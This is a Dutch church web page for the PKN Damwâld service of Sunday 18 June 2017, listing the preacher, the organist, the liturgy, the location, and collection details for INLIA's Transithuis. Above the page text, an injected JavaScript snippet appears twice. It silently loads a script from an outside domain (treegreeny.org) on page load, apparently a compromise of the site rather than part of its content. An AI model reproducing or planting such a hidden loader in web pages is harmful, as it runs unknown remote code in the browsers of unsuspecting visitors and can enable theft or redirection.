;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 juni 2017 9:30 uur - PKN Damwâld
zondag 18 juni 2017
09:30 uur

Kerkdienst zondag 18 juni 2017 9:30 uur

Thema: Gods plannen…

Informatie

Voorganger:Ds. G. Oberink, Urk
Organist:Ivo van Hijum
Thema:Gods plannen…
Liturgie
Lied voor de dienst ELb 174 : 1, 3
Welkom en Mededlingen
intochtslied Psalm 108 : 1
Introtekst Johannes 1 : 4, 5
We zingen: Elb 382 : 1
Thema van de dienst
Kinderlied ELB 479
Verootmoedigingsgebed .
We zingen: Psalm 51 : 5
Gods wet Leviticus 19
We zingen: Gezang 250 : 1, 3, 4
Gebeden .
We zingen: Gezang 255 : 4
We lezen: Exodus 5 :1-9
We zingen: Psalm 105 : 9
We lezen: Exodus 6 : 1-9
We zingen: Psalm 105 : 10
Verkondiging Gods plannen…
We zingen: Gezang 304
Collecte
Dankgebed
Slotlied Psalm 105 : 1, 18
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Terugkeerhuis

Asielzoekers die uitgeprocedeerd zijn, dreigen op straat te komen staan. Ze hebben geen recht meer op voorzieningen in Nederland, maar zien vaak ook geen toekomst in hun land van herkomst. Voor hen is er het Transithuis van stichting INLIA, partner van Kerk in Actie. Hier kunnen uitgeprocedeerde asielzoekers terecht om zich voor te bereiden op terugkeer. Ze krijgen hulp om alvast een sociaal netwerk op te bouwen in hun land van herkomst. Ook treffen ze voorbereidingen voor huisvesting en werk, en zo nodig voor gezondheidszorg of scholing. Op die manier bouwen ze stap voor stap aan een leven in hun land van herkomst. Wanneer terugkeer echt geen optie is, zet INLIA zich ervoor in dat ze toch in Nederland kunnen blijven. INLIA biedt waar nodig praktische, juridische en financiële ondersteuning. Daarnaast adviseert INLIA kerken hoe ze uitgeprocedeerde asielzoekers het beste kunnen helpen. Voor de hulp die INLIA biedt, is veel geld nodig. De collecteopbrengst is bestemd voor het Transithuis van INLIA en andere diaconale projecten van Kerk in Actie. In 2017 steunt Kerk in Actie het Transithuis met 30.000 euro. Geef aan de collecte om dit mogelijk te maken!

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds